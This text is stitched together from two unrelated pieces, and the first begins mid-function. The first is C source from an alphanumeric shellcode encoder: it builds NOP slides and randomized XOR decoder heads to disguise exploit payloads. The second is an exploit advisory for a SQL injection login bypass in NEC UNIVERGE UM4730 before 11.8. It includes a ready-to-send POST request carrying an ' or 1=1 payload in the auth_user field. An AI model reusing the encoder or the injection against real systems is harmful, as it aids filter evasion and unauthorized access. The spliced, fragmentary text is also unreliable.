{ UINT last, randomNum; UCHAR temporary; UCHAR *output = malloc(length); memcpy(output, str, length); for (last = length; last > 1; last--) { randomNum = rand( ) % last; temporary = output[randomNum]; output[randomNum] = output[last-1]; output[last-1] = temporary; } memcpy(str, output, length); return output; }// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > substr_offset) { printf("you can't slide it that far back!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len-slide); strncpy(output_str+prefix_substr_len-slide, substr, substr_len); strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide); strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > str_len-substr_len-substr_offset) { printf("you can't slide it that far forward!\n"); return 0; } output_str = malloc(str_len); 
memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len); strncpy(output_str+prefix_substr_len, suffix_substr, slide); strncpy(output_str+prefix_substr_len+slide, substr, substr_len); strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *get_nop_slide(UINT size, UINT slide) { //simple alnum nop slide generator UINT i, x, append_dec_eax = 0; UCHAR alnum_nop[][3] = { "AI", //inc ecx;dec ecx // (alnum_nop[0]) "BJ", //inc edx;dec edx // (alnum_nop[1]) "CK", //inc ebx;dec ebx // (alnum_nop[2]) "EM", //inc ebp;dec ebp // (alnum_nop[3]) "FN", //inc esi;dec esi // (alnum_nop[4]) "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul] "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ] "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ] "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--. 
//we can freely inc/dec esp for now // "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account // "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from // "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. // | //TODO: <-----------------------------------------------------------------------------------' // push eax push eax push eax push ecx push edx // pop eax push ecx push ecx dec esp pop edx // push ecx pop ecx push edx inc esp push ecx // pop ecx pop eax inc esp pop ecx pop ecx // push edx push edx dec esp push eax push eax // pop edx pop edx pop edx inc esp pop eax // pop ecx dec esp . // pop eax pop eax . // push edx . // pop edx etc... }; UCHAR *nop_slide; nop_slide = malloc(size); memset(nop_slide, 0, size); if(size%2) { append_dec_eax = 1; size--; } for(i=0; i<(size/2); i++) { do x = rand()%(sizeof(alnum_nop)/3); while ((slide==2)&&(x==6||x==7)); strcat(nop_slide, alnum_nop[x]); } if(append_dec_eax) { strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide } return nop_slide; } UCHAR get_random_alnum_push_dword_opcode() { UCHAR alnum_push_dword_opcode[] = { 'P', //0x50 push eax 'Q', //0x51 push ecx 'R', //0x52 push edx 'S', //0x53 push ebx 'T', //0x54 push esp 'U', //0x55 push ebp 'V', //0x56 push esi 'W' //0x57 push edi }; return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; } UCHAR get_random_alnum_value() { char alnum_values[] = ALNUM_CHARSET; return alnum_values[rand()%strlen(alnum_values)]; } UCHAR get_push_register_instruction(UCHAR *reg) { if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx else if (!strcmp(reg, "esp")) 
return 'T'; //0x54 push esp else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi else return 0; } UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) { UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; UCHAR instructions[11][3]; UCHAR instruction_comments[11][28]; UINT i,c, state; UCHAR *output; UCHAR *random_states; UCHAR *p_state[5]; output = malloc(17); memset(output, 0, 17); memset(instructions, 0, 11*3); memset(instruction_comments, 0, 11*28); instructions[0][0] = '\x6a'; //j instructions[0][1] = xor_al1; // instructions[1][0] = '\x58'; //X instructions[2][0] = '\x34'; //4 instructions[2][1] = xor_al1; // instructions[3][0] = '\x48'; //H instructions[4][0] = '\x34'; //4 instructions[4][1] = jne_xor1; // instructions[5][0] = '\x30'; //0 instructions[5][1] = '\x42'; //B instructions[5][2] = size_decoder-1; // instructions[6][0] = '\x52'; //R instructions[7][0] = '\x52'; //R instructions[8][0] = '\x59'; //Y instructions[9][0] = '\x47'; //G instructions[10][0] = '\x43'; //C strcat(instruction_comments[0], "push XOR_AL1"); strcat(instruction_comments[1], "pop eax"); strcat(instruction_comments[2], "xor al, XOR_AL1"); strcat(instruction_comments[3], "dec eax"); strcat(instruction_comments[4], "xor al, JNE_XOR1"); strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); strcat(instruction_comments[6], "push edx"); strcat(instruction_comments[7], "push edx"); strcat(instruction_comments[8], "pop ecx"); strcat(instruction_comments[9], "inc edi"); strcat(instruction_comments[10], "inc ebx"); do { memset(p_state, 0, sizeof(UCHAR*)*5); random_states = shuffle(states, 11); //.*0.*1.*2.*3.*4.*5 p_state[0] = memchr(random_states, 0, 11); if(p_state[0]) p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); 
if(p_state[1]) p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); //.*[67].*8 if(p_state[1]) { p_state[2] = memchr(random_states, 6, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); if(!p_state[3]) { p_state[2] = memchr(random_states, 7, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); } if(p_state[3]) { //.*1.*[67].*[67] if(p_state[2] && p_state[1] < p_state[2]) p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); //.*0.*[67].*8.*1 if(!p_state[4]) p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); if(!p_state[4]) p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); //.*[67].*8.*0.*1.*[67] if(!p_state[4]) p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); } } } while (!p_state[4]); for (c=state=0; state<sizeof(states); state++) { i=0; while (instructions[random_states[state]][i] && i < 3) { output[c] = instructions[random_states[state]][i]; i++; c++; } } printf("======================\ndecoder head instruction order: %x %x %x %x %x %x %x %x %x %x %x\n", random_states[0], random_states[1], random_states[2], random_states[3], random_states[4], random_states[5], random_states[6], random_states[7], random_states[8], random_states[9], random_states[10] ); printf("%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n======================\n", instruction_comments[random_states[0]], 
instruction_comments[random_states[1]], instruction_comments[random_states[2]], instruction_comments[random_states[3]], instruction_comments[random_states[4]], instruction_comments[random_states[5]], instruction_comments[random_states[6]], instruction_comments[random_states[7]], instruction_comments[random_states[8]], instruction_comments[random_states[9]], instruction_comments[random_states[10]]); return output; }
  24. exploit :

    # Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection
    # Vulnerability: SQL injection login bypass
    # Date: 15-12-2016
    # Exploit Author: b0x41s
    # Author web: https://www.xrayit.nl
    # Vendor Homepage: https://www.nec-enterprise.com
    # Category: webapps
    # Version: 11.6.0.31
    # Tested on: Windows server 2008

    Description:
    The auth_user parameter is vulnerable to SQL injection. The login can be bypassed.

    POC:
    POST /admin/index.php HTTP/1.1
    Host: 127.0.0.1
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: https://127.0.0.1/admin/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Lenght: 105
    Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en

    submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de

    Fix answer from vendor:
    The WAC login page is no longer available to sql injection bypassing authentication. The fix was committed prior to releasing 11.8.